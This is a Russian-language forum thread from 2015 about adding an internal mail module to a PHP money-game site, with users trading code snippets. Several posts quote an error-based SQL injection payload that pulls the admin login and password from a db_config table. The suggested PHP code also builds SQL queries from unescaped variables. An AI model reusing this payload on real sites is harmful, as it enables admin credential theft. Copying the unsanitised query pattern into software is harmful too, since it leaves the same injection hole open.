Внутреняя почта

dima20010628 · 18 Янв 2015

Dmytro777 написал(а):
так а как исправить что б на маил приходило и на гмаил, щас кстати попробую яндекс востановить

Помойму ни как,по крайней мере я не видел такого ни на одном проекте,но всё возможно если захотеть

Dmytro777 · 18 Янв 2015

Пожалуйста напишите самый простой пхп скрипт обратной связи

mdsf123 · 18 Янв 2015

Извините,там написано,залить согласно директориям,это как?

kvozimir · 18 Янв 2015

mdsf123 написал(а):
Извините,там написано,залить согласно директориям,это как?

В папки в которых находятся файлы

vitya1998 · 25 Янв 2015

<?
$usid = $_SESSION["user_id"];
$db->Query("SELECT * FROM wmrush_pm WHERE user_id_in = '$usid' AND status = 0 AND inbox = 1");
$sk = $db->NumRows();
if ($sk > 0) {$pmm = '<font color="red">('.$sk.')</font>';} else {$pmm = '<font color="red">(0)</font>';}
куда это вставить

kvozimir · 25 Янв 2015

vitya1998 написал(а):
<?
$usid = $_SESSION["user_id"];
$db->Query("SELECT * FROM wmrush_pm WHERE user_id_in = '$usid' AND status = 0 AND inbox = 1");
$sk = $db->NumRows();
if ($sk > 0) {$pmm = '<font color="red">('.$sk.')</font>';} else {$pmm = '<font color="red">(0)</font>';}
куда это вставить

inc/user_menu.php

vitya1998 · 25 Янв 2015

<div class="acc-title"><?=$_SESSION["user"]; ?></div>
<div class="field-gr"><a href="/account">Мой профиль</a></div>
<div class="field-gr"><a href="/account/farm">Фруктовая ферма</a></div>
<div class="field-gr"><a href="/account/store">Фруктовый склад</a></div>
<div class="field-gr"><a href="/account/market">Торговая лавка</a></div>
<div class="field-gr"><a href="/account/bonus">Ежедневный бонус</a></div>
<div class="field-gr"><a href="/account/lottery">Лотерея</a></div>
<div class="field-gr"><a href="/account/knb">КНБ</a></div>
<div class="field-gr"><a href="/account/swap">Обменник</a></div>
<div class="field-gr"><a href="/account/referals">Ваши рефералы</a></div>
<?
$usid = $_SESSION["user_id"];
$db->Query("SELECT * FROM wmrush_pm WHERE user_id_in = '$usid' AND status = 0 AND inbox = 1");
$sk = $db->NumRows();
if ($sk > 0) {$pmm = '<font color="red">('.$sk.')</font>';} else {$pmm = '<font color="red">(0)</font>';}
?>
<div class="field-gr"><a href="/account/pm">Внутренняя почта <?=$pmm; ?></a></div>
<div class="field-gr"><a href="/account/insert">Пополнить баланс</a></div>
<div class="field-gr"><a href="/account/payment">Заказать выплату</a></div>
<div class="field-gr"><a href="/account/config">Настройки</a></div>
<div class="field-gr"><a href="/?menu=support"> Суппорт</a></div>
<div class="field-rd"><a href="/account/exit">Выход из профиля</a></div>

<div style="margin-top:20px;">
<div class="acc-title">Состояние счета</div>
<div class="field-ar"><a href="/account/insert">{!BALANCE_B!}</a> <span style="margin:3px 10px 0px 0px;">[для покупок]</span></div>
<div class="field-ars"><a href="/account/payment">{!BALANCE_P!}</a> <span style="margin:3px 10px 0px 0px;">[на вывод]</span></div>
</div>
это вот так получится

kvozimir · 25 Янв 2015

vitya1998 написал(а):
<div class="acc-title"><?=$_SESSION["user"]; ?></div>
<div class="field-gr"><a href="/account">Мой профиль</a></div>
<div class="field-gr"><a href="/account/farm">Фруктовая ферма</a></div>
<div class="field-gr"><a href="/account/store">Фруктовый склад</a></div>
<div class="field-gr"><a href="/account/market">Торговая лавка</a></div>
<div class="field-gr"><a href="/account/bonus">Ежедневный бонус</a></div>
<div class="field-gr"><a href="/account/lottery">Лотерея</a></div>
<div class="field-gr"><a href="/account/knb">КНБ</a></div>
<div class="field-gr"><a href="/account/swap">Обменник</a></div>
<div class="field-gr"><a href="/account/referals">Ваши рефералы</a></div>
<?
$usid = $_SESSION["user_id"];
$db->Query("SELECT * FROM wmrush_pm WHERE user_id_in = '$usid' AND status = 0 AND inbox = 1");
$sk = $db->NumRows();
if ($sk > 0) {$pmm = '<font color="red">('.$sk.')</font>';} else {$pmm = '<font color="red">(0)</font>';}
?>
<div class="field-gr"><a href="/account/pm">Внутренняя почта <?=$pmm; ?></a></div>
<div class="field-gr"><a href="/account/insert">Пополнить баланс</a></div>
<div class="field-gr"><a href="/account/payment">Заказать выплату</a></div>
<div class="field-gr"><a href="/account/config">Настройки</a></div>
<div class="field-gr"><a href="/?menu=support"> Суппорт</a></div>
<div class="field-rd"><a href="/account/exit">Выход из профиля</a></div>

<div style="margin-top:20px;">
<div class="acc-title">Состояние счета</div>
<div class="field-ar"><a href="/account/insert">{!BALANCE_B!}</a> <span style="margin:3px 10px 0px 0px;">[для покупок]</span></div>
<div class="field-ars"><a href="/account/payment">{!BALANCE_P!}</a> <span style="margin:3px 10px 0px 0px;">[на вывод]</span></div>
</div>
это вот так получится

ну можно и так)мог и в верх поставить

vitya1998 · 25 Янв 2015

спс за подсказку

vitya1998 · 4 Фев 2015

А как сделать чтоб письмо не отправлялось одному человеку а всем

vladushka · 13 Мар 2015

DENIKA31 написал(а):
Уменя нехрена неработает мне кажется это иза хостинга на денвере отображает хорошо на русском на хостинге нехочет хотя хостинг платный и несколько модулей такаяже беда вместо текста вопросы а вот на денвере всё окей

Пересохрани скрипт блокнотом в кодировке UTF-8

ForeverRED66 · 23 Мар 2015

вопрос,увидал у одного юзверя вот такое сообщения в базе, отправленное пользаку First ,пользак словил бан,а мне стало интересно.

' and
(
select 1
from
(
select count(*),
concat
(
(
select (select concat(admin,' ',pass) from db_config where id = 1)
from information_schema.tables
limit 0,1
),
floor(rand(0)*2)
) x
from information_schema.tables
group by x) a
)
and '

пользака First и admin переименовал еще давно,но все же что значит этот код?

Андрей · 23 Мар 2015

ForeverRED66 написал(а):
вопрос,увидал у одного юзверя вот такое сообщения в базе, отправленное пользаку First ,пользак словил бан,а мне стало интересно.

' and
(
select 1
from
(
select count(*),
concat
(
(
select (select concat(admin,' ',pass) from db_config where id = 1)
from information_schema.tables
limit 0,1
),
floor(rand(0)*2)
) x
from information_schema.tables
group by x) a
)
and '

пользака First переименовал еще давно,но все же что значит этот код?

Иньекция, которая показывает логин и пароль от админки.

ForeverRED66 · 24 Мар 2015

Андрей написал(а):
Иньекция, которая показывает логин и пароль от админки.

как можно защититься от подобного?

Андрей · 24 Мар 2015

ForeverRED66 написал(а):
как можно защититься от подобного?

не ко мне

dima20010628 · 24 Мар 2015

Мне просто интересно, вот допустим он написал это сообщение в суппорт и что дальше ? Где он увидит пароль ?

wh1skas · 24 Мар 2015

так ведь инъекциями раскидываются в полях для ввода при передаче POST-параметров, и GET тоже. А отправка письма передается по сабмиту (POST-запрос).

valefo20 · 4 Июл 2015

ForeverRED66 написал(а):
вопрос,увидал у одного юзверя вот такое сообщения в базе, отправленное пользаку First ,пользак словил бан,а мне стало интересно.

' and
(
select 1
from
(
select count(*),
concat
(
(
select (select concat(admin,' ',pass) from db_config where id = 1)
from information_schema.tables
limit 0,1
),
floor(rand(0)*2)
) x
from information_schema.tables
group by x) a
)
and '

пользака First и admin переименовал еще давно,но все же что значит этот код?

Если ты этот код увидел у себя, значит боятся нечего. Все в норме. Твоя защита сработала. Проверьте сканером файлик. Дыр не меряно.

valefo20 · 4 Июл 2015

Кстати, а почему дублирует сообщения? Я вот отправляю своим рефералам одно сообщение а приходят 2. Я так понимаю нагрузка на БД тоже есть какая то? Где это изменить?